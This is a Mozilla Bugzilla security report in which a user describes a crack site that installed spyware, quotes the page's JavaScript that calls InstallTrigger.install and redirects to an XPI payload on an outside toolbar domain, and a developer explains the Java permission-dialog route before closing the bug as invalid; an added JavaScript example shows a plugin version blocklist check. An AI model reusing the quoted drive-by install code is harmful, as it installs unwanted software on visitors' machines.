Closed
Bug 284384
Opened 19 years ago
Closed 19 years ago
[security] Site starts up IE and installs spyware
Categories
(Core :: Security, defect)
RESOLVED
INVALID
People
(Reporter: u81239, Assigned: dveditz)
Details
(Whiteboard: [sg:needinfo])
Attachments
(3 files)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050223 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050223 Firefox/1.0+

If you go to the cracks.am site, at http://www.cracks.am/d.x?65093 (excuse the illegal nature of this link), it will open an IE window and install spyware. I think it's probably doing something with JavaScript, that's why I filed it into this category, but I really wouldn't know (and don't feel like finding it out myself at the risk of getting infected with spyware time after time after time).

~Grauw

Reproducible: Always

Steps to Reproduce:
1. Have IE installed on your computer
2. Go to http://www.cracks.am/d.x?65093
3. Get infected with spyware through the opened IE window

Actual Results:
Spyware got installed. Amongst others SideFind, CoolWebSearch, Performance-something and more (iirc).

Expected Results:
I should be able to surf securely and safely.
The offending JavaScript code seems to be this:

    else {
      if(!(GetCookie_protect("exelimiter") || exelimiter)) {
        if (bname == 'Netscape') {
          if (InstallTrigger.updateEnabled()) {
            InstallTrigger.install({'Content Access Plugin 1.01' : 'http://www.xxxtoolbar.com/ist/softwares/v3.0/protect_regular.xpi'});
          } else {
            location.replace('http://www.xxxtoolbar.com/ist/softwares/bundlers//istinstall_regular.xpi');
          }
        } else {
          location.replace('http://www.xxxtoolbar.com/ist/softwares/bundlers//istinstall_regular.xpi');
        }
        SetCookie_protect("exelimiter","1", 0);
        exelimiter=1;
        setTimeout('location.replace(gurl)',10000);
      } else {
        location.replace(gurl);
      }
    }

It seems to try to install an XPI. Now that I mention it, I do recall at some time having been prompted an XPI install window on that site. I never clicked ok though! - I clicked on the [X] close button, but the XPI was still installed! (apparently it still and really is - wonder how to get rid of it)

~Grauw
I risked my life to get you guys the source of the offending page :).
Comment 5 • 19 years ago (Assignee)
If you're running Firefox this site shouldn't be able to launch a XPI -- you should get the infobar at the top saying an install attempt from that site was blocked. If you unblocked the site and then agreed to install something, well, it was installed. Hard to protect against that. (I'll get back to the close button thing in a bit...)

When I opened the captured page it also tried to install something using java, popping up a big scary permission dialog. Do you have Java? If so, what version? (check using about:plugins). I ask because we've seen similar sites take advantage of a Sun JRE flaw in 1.4.2_05 and below to install things without notice. The site appears to throw a lot of potential exploits against different browsers so it *might* use the older java flaw in addition to the straight-forward privilege dialog I saw.

Back to the install close button thing. That would be a serious bug, obviously, but not one I've ever seen. Are you sure it was a XPI that ran? If it did it would leave a record in install.log in the installation directory (or your profile if the install dir is write protected). Look and see what you find there.

Also interesting is your initial claim that it opened an IE window, and then got infected through that. It would certainly be dangerous if something could open an IE window, but there's no evidence of how it did that. Probably the IE window was opened by the exploit itself after it was already installed.
Whiteboard: [sg:needinfo]
Now that you mention it, a while earlier on that site, I had a Java popup asking me whether it could install the software appear with the Yes button right under my mouse cursor when I clicked, so I accidentally clicked yes... :/
I uninstalled Java 1.4.0.03 and installed 1.5.0.02 and the problem is gone... I'm happy to be rid of it, but there will be millions of users still using an older Java version just like me. The fact that the Java download page is quite cryptic for the ‘dummy’ user doesn’t help either, even I had trouble finding the proper download package.

I can't help that a number of Firefox's main ‘security’ problems are related to plugins. This, and I heard about Flash popups as well. Is there a plan to address these kinds of issues?

~Grauw
Comment 8 • 19 years ago (Assignee)
(In reply to comment #7)
> I can't help that a number of Firefox's main ‘security’ problems are related
> to plugins. This, and I heard about Flash popups as well. Is there a plan to
> address these kinds of issues?

Yes, we have plans to include plugins in the extension update service, blacklist (disable) extensions and plugins with known critical vulnerabilities, block plugins from opening windows, and more. Don't have all the bug numbers handy.

We're also looking into whether it's possible to block Java from asking for enhanced permissions except for whitelisted sites. People could list their corporate intranet apps and then not worry about malicious Java permission dialogs popping up elsewhere. Your comment 6 suggests the Java permission dialog might be vulnerable to something like bug 162020, all the more reason to keep it from coming up.

Since the spyware was installed after you gave it explicit permission to do so, albeit mistakenly, this bug ought to be closed. Rest assured that we are addressing the related issues in other bugs, though.
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → INVALID
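Comment 5 names a cut-off ("a Sun JRE flaw in 1.4.2_05 and below") and comment 8 describes the planned fix on the browser side: disable plugins with known critical vulnerabilities from a blocklist. The following is an added example, not code from this bug or from Mozilla, of what such a version-range blocklist check looks like. It assumes JRE version strings in the two shapes that appear in this thread ("1.4.2_05" and "1.4.0.03": major.minor.patch with an optional update number separated by "_" or "."), and the plugin name "Java(TM) Plug-in" and the shape of the blocklist entry are assumptions for the example.

```javascript
// Added example: a plugin blocklist check of the kind comment 8 describes.
// Not part of the bug report or of any Mozilla code.

// Parse a JRE version string such as "1.4.2_05" or "1.4.0.03" into numeric parts.
// Constructed parser: major.minor, optional patch, optional update number
// separated by "_" or "."; missing parts default to 0.
function parseJreVersion(version) {
  const match = /^(\d+)\.(\d+)(?:\.(\d+))?(?:[._](\d+))?$/.exec(version.trim());
  if (!match) {
    throw new Error("unrecognised JRE version string: " + version);
  }
  return match.slice(1).map((part) => (part === undefined ? 0 : Number(part)));
}

// Compare two versions part by part: negative if a < b, 0 if equal, positive if a > b.
function compareJreVersions(a, b) {
  const pa = parseJreVersion(a);
  const pb = parseJreVersion(b);
  for (let i = 0; i < pa.length; i++) {
    if (pa[i] !== pb[i]) return pa[i] - pb[i];
  }
  return 0;
}

// Blocklist: every version at or below maxVulnerable is disabled.
// The cut-off is the "1.4.2_05 and below" figure from comment 5; the entry
// name and layout are assumptions made for this example.
const PLUGIN_BLOCKLIST = [
  { name: "Java(TM) Plug-in", maxVulnerable: "1.4.2_05" },
];

// Return the blocklist entry that disables this plugin, or null if it may run.
// Returning the entry (not just true/false) lets the caller tell the user why.
function blocklistEntryFor(pluginName, installedVersion) {
  for (const entry of PLUGIN_BLOCKLIST) {
    if (entry.name === pluginName &&
        compareJreVersions(installedVersion, entry.maxVulnerable) <= 0) {
      return entry;
    }
  }
  return null;
}

// Stand-alone demonstration with the versions mentioned in the thread.
for (const v of ["1.4.0.03", "1.4.2_05", "1.4.2_06", "1.5.0.02"]) {
  const hit = blocklistEntryFor("Java(TM) Plug-in", v);
  console.log(v, hit ? "DISABLED (<= " + hit.maxVulnerable + ")" : "allowed");
}
```

The reporter's 1.4.0.03 and the cut-off 1.4.2_05 itself are both disabled; 1.4.2_06 and the 1.5.0.02 the reporter upgraded to pass. Comparing numerically rather than as strings matters here: a lexical comparison would rank "1.4.2_10" below "1.4.2_05".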